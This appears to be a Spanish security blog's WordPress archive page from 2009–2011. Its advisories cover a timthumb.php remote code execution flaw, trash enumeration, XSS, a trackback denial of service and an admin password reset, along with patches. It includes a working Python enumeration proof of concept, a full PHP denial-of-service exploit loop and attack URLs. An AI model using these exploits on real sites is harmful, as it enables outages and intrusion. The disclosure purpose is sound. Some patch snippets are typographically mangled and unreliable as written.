La Comunidad DragonJAR » WordPress

Vulnerabilidad en timthumb.php afecta millones de blogs con WordPress

Hans Code — Thu, 04 Aug 2011 19:20:58 +0000

Recientemente Mark Maunder, CEO de Feedjit descubrió una vulnerabilidad en la librería timthumb.php, que podría permitir a un usuario malintencionado, ejecutar código PHP de manera arbitraria.

Gracias a timthumb.php es posible cambiarle de tamaño a las imágenes de forma automática. Esta utilidad presente en millones de plantillas de WordPress, utiliza un directorio que es accesible vía web, para alojar las imágenes resultantes del proceso de obtener una imagen y redimensionarla.

Por defecto, timthumb.php (también nombrado como thumb.php en ciertas plantillas) permite cargar y redimensionar imágenes remotamente desde los siguientes dominios:

$allowedSites = array (
	'flickr.com',
	'picasa.com',
	'blogger.com',
	'wordpress.com',
	'img.youtube.com',
	'upload.wikimedia.org',
	'photobucket.com',
);

Generalmente el directorio en cuestión es nombrado como “cache”. El problema radica en que timthumb.php no comprueba correctamente los dominios desde donde es posible recibir una imagen. En consecuencia y dado que el directorio “cache” puede ser accesible desde el navegador web, pues un atacante podría cargar y ejecutar código PHP arbitrario y hacer de las suyas con solo especificar algunos de los dominios del array anterior en la URL; por ejemplo:

http://blogger.com.dominio.com/badscript.php

De esta manera, timthumb.php lo alojará el fichero badscript.php dentro del directorio de caché en el sitio de destino, por ejemplo:

http://tudominio.com/wp-content/themes/tuplantilla/cache/badscript.php

Así las cosas, desde el navegador cualquier código que haya en el fichero badscript.php será ejecutado por el servidor web del usuario víctima. Tal cual, lo explica Maunder quien descubrió la vulnerabilidad cuando realizaba una auditoria de un ataque ejecutado en su propio blog.

Plantillas de Woothemes, Elegantthemes, Themeforest, templatic, entre miles de otros proveedores, son vulnerables.

Instrucciones para reparar la vulnerabilidad y mitigar los riesgos.

Si utilizas plantillas de Woothemes y tienes una cuenta en este sitio, desde ya puedes descargar la versión actualizada de tu theme, tomar el thumb.php vulnerable y reemplazarlo por el nuevo. En otro caso, la recomendación es descargar la versión actualizada de timthumb.php (la 1.33) y a partir de este actualizar el timthumb.php de tu plantilla.

Adicionalmente, en la línea 27 del script actualizado, eliminar todos los dominios permitidos del array ($allowedSites = array();)

Del mismo modo, recomendamos asegurarse de que la siguiente linea se haya establecido como FALSE:

define ('ALLOW_EXTERNAL', FALSE);           // allow external website (override security precaution - not advised!)

Esta vulnerabilidad es considerada como critica y al hacer una búsqueda en Google, obtenemos 40 millones de resultados relacionados con el script.

WordThumb, la versión segura de timthumb.php

Hace unas horas, Maunder, ha publicado una tercera actualización donde da a conocer detalles de un nuevo proyecto llamado Wordthumb, que promete ser la versión segura de lo que conocemos como timthumb.php y es el resultado de una reescritura completa de este script, sin afectar la compatibilidad del mismo. El único código que sigue siendo original de timthumb, son las rutinas de procesamiento de imágenes. Todo lo demás ha sido reconstruido desde cero.

Las instrucciones básicas sobre como usar este código se encuentra disponible en Google Code. Dentro de la mejoras se destacan aspectos como la utilización de un directorio que no es accesible vía web para el almacenamiento de las imágenes que son redimensionadas y además como medida de seguridad extra, todos los archivos almacenados en caché, tiene una extensión txt, entre otras mejoras.

Para más detalles sobre Wordthumb te invitamos a leer el anuncio de Maunder: A secure rewrite of timthumb.php as Wordthumb

También puede interesarte...

WordPress 3.1

DragoN — Tue, 15 Feb 2011 16:52:42 +0000

Después de mucha espera, algunos retrasos, por fin sale la nueva versión 3.1 de WordPress.

Entre las mejoras mas importantes, podemos encontrar:

Consultas avanzadas: algo que muchos estábamos pediendo.
Enlaces internos: para buscar entradas anteriores de tu sitio y enlazarlas facilmente.
Barra de administrador: que aparecerá cuando estemos logueados en el sitio como admin, sin entrar al panel.
Mejor panel de escritura: mucho mas limpia y sencilla que antes, con muchas opciones que no usábamos ocultas por defecto
Administrador de la red: se agruparon los menús de admin y sus opciones en la nuevaPantalla de administrador de la red.
Ademas mejores en el sistema del exportado/importado, su esquema de colores y en el contenido personalizado entre otras

Descargar WordPress 3.1 Español

Lo puedes bajar desde de tu WordPress (si ya te aparece el mensaje) o desde la página oficial de WordPress.org.

También puede interesarte...

WordPress el CMS OpenSource más Seguro

DragoN — Wed, 04 Aug 2010 17:11:32 +0000

Un estudio realizado por el investigador de seguridad para Qualys y creador de BlindElephant, Patrick Thomas, saco a relucir que la mayoría de los CMS OpenSource que encontramos en la red, tienen un alto grado de problemas en su seguridad, aplicaciones como MediaWiki, Joomla, Movile Type, y Drupal, son solo algunas de las que quedan peor paradas en este aspecto según este informe, también se puede destacar a WordPress como el CMS OpenSource mas seguro (o menos inseguro…) que podemos utilizar libremente.

Thomas se puso en la tarea de examinar uno a uno los CMS OpenSource mas populares que existen en la actualidad, utilizando su creación BlindElephant, que le permite identificar con un pequeño margen de error, las versiones de un CMS utilizadas en una pagina, con esta informacion en mano y utilizando los anuncios sobre vulnerabilidades publicados por los mismos fabricantes, pudo sacar un mapa con la versión de cada CMS y sus respectivos problemas de seguridad, dando como resultado un “ranking” de los CMS y su porcentaje de los fallos en seguridad que han presentado.

Les recomiendo que vean la charla que Patrick realizo en la pasada BlackHat USA 2010 (pueden descargar las demás charlas en este enlace) donde presento su investigación:

De la charla podemos sacar los siguientes porcentajes de Vulnerabilidades Criticas en algunos de los CMS mas populares:

95% creados con MediaWiki
91% de los sitios basados en Joomla
77% de los sitios creados con Movable Type
69% de sitios creados con Drupal
WordPress “solo” mostró un 4% de vulnerabilidades críticas y un 21.5% de vulnerabilidades medias, coronandolo como el CMS OpenSource (solo se analizaron los mas populares) menos inseguros.

A mi personalmente me gusta mucho WordPress, el hecho que traiga “solo lo necesario” pero que se puedan expandir sus posibilidades hasta el nivel que necesitemos es lo que mas me llama la atención, su camaradería con los buscadores, su actualizado automático y un sinfin de otras características han hecho que lo utilice como base para muchos de mis proyectos. Si estas indeciso sobre que CMS utilizar, desde nuestra comunidad te recomendamos WordPress.

Si quieres aumentar aun la seguridad de tu WordPress te recomiendo leer la guía de seguridad para WordPress en Español y el documento sobre como configurar adecuadamente el mod_security para tu instalación de WorPress.

Mas Información:
Qualys Releases “BlindElephant” Open Source Web Application Fingerprinting Tool

También puede interesarte...

Descarga WordPress 3.0

DragoN — Tue, 15 Jun 2010 20:22:44 +0000

Después de mucha espera, algunos retrasos y RC para “contentarnos” por los retrasos, por fin sale la nueva versión 3.0 de WordPress.

Entre las mejoras mas importantes, podemos encontrar:

Ahora podremos escoger el nombre de usuario y contraseña a la hora de instalar WordPress, algo altamente recomendable para aumentar la seguridad de nuestra instalación.
Guía o asistente de bienvenida, para facilitar aun mas a los nuevos usuarios el uso de WordPress.
Mejoras en los “Tipos de Post”
Nuevo tema “Twenty” altamente configurable.
Añadiendo la línea de código add_custom_background(); al archivo functions.php podemos cambiar a gusto el fondo de cualquier tema.
Podremos personalizar cada categoría con un tema (plantilla o theme) diferente.
Canonical desarrollará plugins para WordPress, la empresa detras de Ubuntu, ahora también desarrollara plugins para WP.
El menú de navegación ahora es totalmente configurable, podremos poner categorías y subcategorias a gusto.
Integración con WordPress MU

Les dejo este vídeo con las nuevas características:

Mas Información:
WordPress 3.0 “Thelonious”

También puede interesarte...

Pueden leer tu “Basura”

DragoN — Mon, 15 Feb 2010 07:33:25 +0000

Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a “cualquier” persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la “papelera”.

Desde la versión 2.9 de WordPress se implementó una nueva característica llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental.

Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”.

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)
import httplib
# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0
conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}
print
print “Target = http://” + blogURL + “/?p=” + str(postID)
print
while 1:
# Start non authenticated enumeration
request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)
try:
r1 = conn.getresponse()
except:
print “Connection error”
data1 = r1.read()
# Start authenticated enumeration
conn.request(“GET”, request, None, Headers)
try:
r2 = conn.getresponse()
except:
print “Connection error”
data2 = r2.read()
# Compare the HTML body reponses
if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print request
postID += 1
conn.close()

Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad.

Una vez más queda confirmado que la seguridad por “oscuridad” no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.

PD. Lo que no entiendo es por que páginas como DaboWeb y Mangas Verdes hablan de este fallo y afirman que un posible atacante puede “Eliminar artículos de nuestro WordPress” ¿De donde habrán sacado esa informacion?…

También puede interesarte...

Nueva versíon de WordPress 2.9

DragoN — Fri, 18 Dec 2009 05:03:28 +0000

La nueva versión de WordPress, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes:

Editor de Imágenes Online: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar y rotar, funciones que hace mucho hacían falta
Papelera: En esta nueva versión WordPress incorpora un sistema de papelera para nuestros post y comentarios borrados, para activarla debemos agregar la siguiente linea define( ‘EMPTY_TRASH_DAYS’, 30 ); en nuestro wp-config.php donde 30 son los días a guardar los post y comentarios en la papelera.
Incrustación de multimedia: ya no hará falta el código embed, simplemente poniendo la URL mostrará el contenido, los sistemas soportados son: YouTube, Daily Motion, Blip.tv, Flickr, Hulu, Viddler, Qik, Revision3, Scribd, Google Video, Photobucket, PollDaddy, y WordPress.tv.
Gestión de Multimedia: El gestor de contenidos multimedia se ha vuelto a escribir desde 0, para mejorar sus funcionalidades.
Sistema de Actualización: Ahora es posible actualizar los plugins masivamente.
Reparación de base de datos: Una nueva utilidad integrada en el sistema nos permite realizar una reparación de nuestra base de datos en caso de que tenga errores, para esto solo necesitamos añadir en el archivo wp-config.php esta línea: define(’WP_ALLOW_REPAIR’, true);. Después de reparada la tabla, la eliminamos.
Seguridad: Se han mejorado múltiples aspectos en la seguridad de WordPress y reparados mas de 500 errores reportados, esperemos que esta versión sea estable en cuanto a seguridad y no tengan que sacar nuevas versiones solo para corregir problemas de seguridad.

La anterior lista son solo algunas de las nuevas funcionalidades de WordPress, si quieres ver todos los cambios de esta versión 2.9 ingresa a este enlace.

Descargar WordPress 2.9

Mas Información:
Codex Versión 2.9
WordPress 2.9, oh so fine

También puede interesarte...

XSS que permite postear a atacante registrado en WordPress

DragoN — Thu, 12 Nov 2009 07:56:06 +0000

Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra pagina.

El segundo problema no es explicado claramente en el comunicado oficial de WordPress, solo nos comentan que el error se encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.

Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o descargando la ultima version desde su pagina oficia, para asegurarse de que tiene la mejor protección disponible.

También puede interesarte...

Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5

DragoN — Wed, 21 Oct 2009 07:08:09 +0000

Desde hace unos meses los desarrolladores de wordpress están trabajando en lo que seria la versión 2.9 del famoso administrador de contenidos, pero debido a los eventos recientes relacionados con la seguridad en wordpress se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de corregir y prevenir problemas de seguridad futuros.

Por esta razón publican una nueva version de WordPress 2.8.5 en la que todos los cambios realizados son relacionados con la seguridad:

Arreglaron el error del archivo wp-trackback.php que permitía una Denegacion de Servicio en WordPress
Realizaron una re validación de variables para que errores como los del trackback no ocurran de nuevo.
Se realizó un cambiado en el archivo que permite subir a la lista blanca todos los usuarios, incluidos los Administradores.
Eliminados 2 importadores de etiquetas para plugins viejos.

Es recomendable que se se actualicen a esta nueva versión de WordPress para asegurarse de que tiene la mejor protección disponible.

En el anuncio realizado por Peter Westwood se recomienda la utilización del plugin WordPress Exploit Scanner, para buscar código sospechoso en la base de datos de los post y comentarios, mas informacion sobre este plugin en su pagina oficial.

También puede interesarte...

Denegacion de Servicio en WordPress

DragoN — Sun, 18 Oct 2009 21:26:41 +0000

Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio.

El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable $charset, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.

Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress tampoco lo soluciona), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con mod_security, no seria vulnerable ya que bloquearía estas peticiones mal intencionadas, también se pueden mitigar los daños con una adecuada configuración del parámetro php_memory_limit del php.ini para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress WordPress Security Whitepaper) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.

Les dejo la solución propuesta por Jose Carlos en su blog para este problema:

Reemplazar en la linea 45 del archivo wp-trackback.php esto $charset = $_POST['charset'];
por esto
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Y el exploit para verificar que somos vulnerables:

//wordpress Resource exhaustion Exploit //http://rooibo.wordpress.com/ //security@wordpress.org contacted and get a response, //but no solution available. if(count($argv) < 2) { echo “You need to specify a url to attack\n”; exit; }
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) {
echo “down!!!!\n”;
exit;
}
echo “unable to connect to: “.$data['host'].”\n”;
exit;
}
fputs($fp, “POST $path HTTP/1.1\r\n”);
fputs($fp, “Host: “.$data['host'].”\r\n”);
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
fputs($fp, “Content-length: “.strlen($str).”\r\n”);
fputs($fp, “Connection: close\r\n\r\n”);
fputs($fp, $str.”\r\n\r\n”);
echo “hit!\n”;
$count++;
}
?>

Para mas informacion:
Agujero de seguridad muy grave en WordPress
Atención! BUG WordPress
WordPress Security Whitepaper

$charset = $_POST['charset'];

También puede interesarte...

Reseteo Remoto del Password de Admin en WordPress

DragoN — Wed, 12 Aug 2009 04:36:49 +0000

No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:

http://PAGINAAQUI.COM/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:

if ( empty( $key ) )

y remplazarlo por:

if ( empty( $key ) || is_array( $key ) )

Aunque como siempre es recomendable que actualices tu versión a la WordPress a la 2.8.4 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.